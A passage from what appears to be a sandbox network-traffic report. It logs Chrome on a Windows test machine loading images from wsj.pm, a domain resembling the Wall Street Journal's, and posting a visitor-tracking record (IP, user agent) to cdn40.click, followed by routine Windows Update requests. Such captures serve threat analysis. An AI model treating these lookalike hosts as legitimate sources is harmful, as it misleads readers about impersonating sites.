                                                                                                                Content-Length: 1210
                                                                                                                Connection: close
                                                                                                                Content-Type: image/avif


                                                                                                                Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                36          192.168.2.17  49756        103.113.70.37   443               6544  C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp                Bytes transferred  Direction  Data
                                                                                                                2024-04-25 14:58:20 UTC  371                OUT        GET /img/CH-AA158_Bernst_NS_20100111195708.gif HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC | 250 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:37 GMT
                                                                                                                ETag: "1c6a-61648fceb4f40"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 7274
                                                                                                                Connection: close
                                                                                                                Content-Type: image/gif
                                                                                                                2024-04-25 14:58:20 UTC | 7274 | IN | Data Ascii: GIF89aLLlllsssVVVqqqXXX\\\YYYvvvfffeeetttyyyIIIkkkcccTTThhhQQQUUUpppgggooo]]]aaaFFFSSSrrrWWWHHHJJJOOOwwwxxx}}}dddzzz___@@@PP


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                37 | 192.168.2.17 | 49758 | 23.133.88.190 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:20 UTC | 648 | OUT | POST /9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95 HTTP/1.1
                                                                                                                Host: cdn40.click
                                                                                                                Connection: keep-alive
                                                                                                                Content-Length: 252
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Content-Type: application/json
                                                                                                                Accept: */*
                                                                                                                Origin: https://wsj.pm
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:20 UTC | 252 | OUT | Data Ascii: {"f":"d99844e1-4599-410e-aa0d-b504c5ca3ddf","m":"25","page":"/","timestamp":"2024-04-25T14:58:18.262Z","ip":"185.152.66.230","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36"}
                                                                                                                2024-04-25 14:58:21 UTC | 284 | IN | HTTP/1.1 201 Created
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 0
                                                                                                                Connection: close
                                                                                                                X-Powered-By: Express
                                                                                                                access-control-allow-origin: https://wsj.pm
                                                                                                                vary: Origin
                                                                                                                ETag: W/"0-2jmj7l5rSw0yVb/vlWAYkK/YBwk"


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                38 | 192.168.2.17 | 49757 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:20 UTC | 575 | OUT | GET /img/im-647221.avif HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC | 251 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:20 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:18:01 GMT
                                                                                                                ETag: "1391-6164901ed0c40"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 5009
                                                                                                                Connection: close
                                                                                                                Content-Type: image/avif
                                                                                                                2024-04-25 14:58:21 UTC | 5009 | IN | Data Ascii: ftypavifavifmif1miafMA1Bmeta(hdlrpictlibavifpitmilocDr(iinfinfeav01ColoroiprpOipcoispe<<pixiav1Ccolrprofappl


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                39 | 192.168.2.17 | 49759 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:20 UTC | 606 | OUT | GET /img/wsj-logo-big-black.e653dfca.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/css/footer.css
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC | 255 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:27:50 GMT
                                                                                                                ETag: "442b-6164925087980"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 17451
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml
                                                                                                                2024-04-25 14:58:21 UTC | 7937 | IN | Data Ascii: <svg width="243" height="46" viewBox="0 0 243 46" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M6.71975 19.4684C6.71975 20.4248 6.99201 20.6092 7.59774 20.7642L8.53604 20.9803V21.4124H2.30052V20.9803L3.
                                                                                                                2024-04-25 14:58:21 UTC | 8000 | IN | Data Ascii: 608 2.0362V16.7533C187.608 19.7459 188.455 20.5175 189.999 20.5175C191.816 20.5175 192.573 19.4684 192.573 16.4446V4.16505C192.573 1.57336 192.542 0.956403 191.453 0.709618L190.878 0.586226V0.154127H200.806C203.379 0.154127 205.77 1.82015 205.77 5.30632C2
                                                                                                                2024-04-25 14:58:21 UTC | 1514 | IN | Data Ascii: 36.8703 119.784 35.3853 118.014 35.3853C117.054 35.3853 116.364 35.8053 115.839 36.2403L115.614 35.5353H114.504V45.9003H115.944V42.8253Z" fill="black"/><path d="M125.209 42.2553C124.279 42.2553 123.739 41.7753 123.739 40.9503C123.739 40.6053 123.844 40.2


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                40 | 192.168.2.17 | 49760 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:20 UTC | 599 | OUT | GET /img/google-play.4699f3c2.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/css/footer.css
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC | 254 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:28:06 GMT
                                                                                                                ETag: "194b-6164925fc9d80"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 6475
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml
                                                                                                                2024-04-25 14:58:21 UTC | 6475 | IN | Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 115.8 27.3"><g display="none"><path display="inline" d="M120,33.2H-5c-2.8,0-5-2.2-5-5v-30c0-2.8,2.2-5,5-5h125c2.8,0,5,2.2,5,5v30C125,31,122.8,33.2,120,33.2z"/></g><g><path fill="#FFFFFF" stroke="#FFFFFF


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                41 | 192.168.2.17 | 49761 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:20 UTC | 596 | OUT | GET /img/appstore.a6e93ba3.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://wsj.pm/css/footer.css
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC | 254 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:28:18 GMT
                                                                                                                ETag: "1558-6164926b3b880"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 5464
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                42 | 192.168.2.17 | 49762 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:20 UTC | 341 | OUT | GET /img/AM.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC | 252 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:16:52 GMT
                                                                                                                ETag: "4b4e-61648fdd03100"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 19278
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                43 | 192.168.2.17 | 49763 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:20 UTC | 347 | OUT | GET /img/im-948629.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC | 251 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:17 GMT
                                                                                                                ETag: "5584-61648ff4da940"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 21892
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                44 | 192.168.2.17 | 49765 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:21 UTC | 340 | OUT | GET /img/AM.png HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC | 251 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:03 GMT
                                                                                                                ETag: "c5a8-61648fe7809c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 50600
                                                                                                                Connection: close
                                                                                                                Content-Type: image/png


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                45 | 192.168.2.17 | 49766 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:21 UTC | 348 | OUT | GET /img/im-949113.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC | 250 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:29 GMT
                                                                                                                ETag: "c91-616490004c440"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 3217
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                46 | 192.168.2.17 | 49767 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:21 UTC | 348 | OUT | GET /img/im-949723.jpeg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC250INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:17:39 GMT
                                                                                                                ETag: "4da-61649009d5ac0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 1242
                                                                                                                Connection: close
                                                                                                                Content-Type: image/jpeg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.17 | 49771 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:21 UTC | 350 | OUT | GET /img/im-44291453.avif HTTP/1.1
Host: wsj.pm
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:21 UTC | 250 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Apr 2024 14:58:21 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 17 Apr 2024 11:17:51 GMT
ETag: "4ba-61649015475c0"
Accept-Ranges: bytes
Content-Length: 1210
Connection: close
Content-Type: image/avif


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.17 | 49774 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:21 UTC | 568 | OUT | GET /favicon.ico HTTP/1.1
Host: wsj.pm
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://wsj.pm/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:21 UTC | 266 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Apr 2024 14:58:21 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 17 Apr 2024 11:10:20 GMT
ETag: "3326-61648e672bf00"
Accept-Ranges: bytes
Content-Length: 13094
Connection: close
Content-Type: image/vnd.microsoft.icon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.17 | 49775 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:21 UTC | 348 | OUT | GET /img/im-647221.avif HTTP/1.1
Host: wsj.pm
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:21 UTC | 251 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Apr 2024 14:58:21 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 17 Apr 2024 11:18:01 GMT
ETag: "1391-6164901ed0c40"
Accept-Ranges: bytes
Content-Length: 5009
Connection: close
Content-Type: image/avif


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.17 | 49776 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:21 UTC | 358 | OUT | GET /img/google-play.4699f3c2.svg HTTP/1.1
Host: wsj.pm
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:21 UTC | 254 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Apr 2024 14:58:21 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 17 Apr 2024 11:28:06 GMT
ETag: "194b-6164925fc9d80"
Accept-Ranges: bytes
Content-Length: 6475
Connection: close
Content-Type: image/svg+xml


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.17 | 49777 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:21 UTC | 355 | OUT | GET /img/appstore.a6e93ba3.svg HTTP/1.1
Host: wsj.pm
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:21 UTC | 254 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Apr 2024 14:58:21 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 17 Apr 2024 11:28:18 GMT
ETag: "1558-6164926b3b880"
Accept-Ranges: bytes
Content-Length: 5464
Connection: close
Content-Type: image/svg+xml


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.17 | 49778 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:58:21 UTC | 365 | OUT | GET /img/wsj-logo-big-black.e653dfca.svg HTTP/1.1
Host: wsj.pm
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-25 14:58:21 UTC | 255 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Apr 2024 14:58:21 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Wed, 17 Apr 2024 11:27:50 GMT
ETag: "442b-6164925087980"
Accept-Ranges: bytes
Content-Length: 17451
Connection: close
Content-Type: image/svg+xml


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                53 | 192.168.2.17 | 49779 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:22 UTC | 341 | OUT | GET /favicon.ico HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:22 UTC | 266 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:22 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:10:20 GMT
                                                                                                                ETag: "3326-61648e672bf00"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 13094
                                                                                                                Connection: close
                                                                                                                Content-Type: image/vnd.microsoft.icon


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                54 | 192.168.2.17 | 49780 | 20.114.59.183 | 443
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:28 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DxOPtc+GXgku2Br&MD=fPkl8aYr HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                2024-04-25 14:58:28 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Expires: -1
                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                MS-CorrelationId: 9b4c8f58-3089-4ae5-808a-e9ee32e0f387
                                                                                                                MS-RequestId: c9d726c9-f984-48f9-9ae6-c522871dd194
                                                                                                                MS-CV: 5+kjInXdlk6vKal5.0
                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Thu, 25 Apr 2024 14:58:27 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 24490


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                55 | 192.168.2.17 | 49784 | 184.31.62.93 | 443
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:37 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                Accept-Encoding: identity
                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                Host: fs.microsoft.com
                                                                                                                2024-04-25 14:58:37 UTC | 467 | IN | HTTP/1.1 200 OK
                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                Content-Type: application/octet-stream
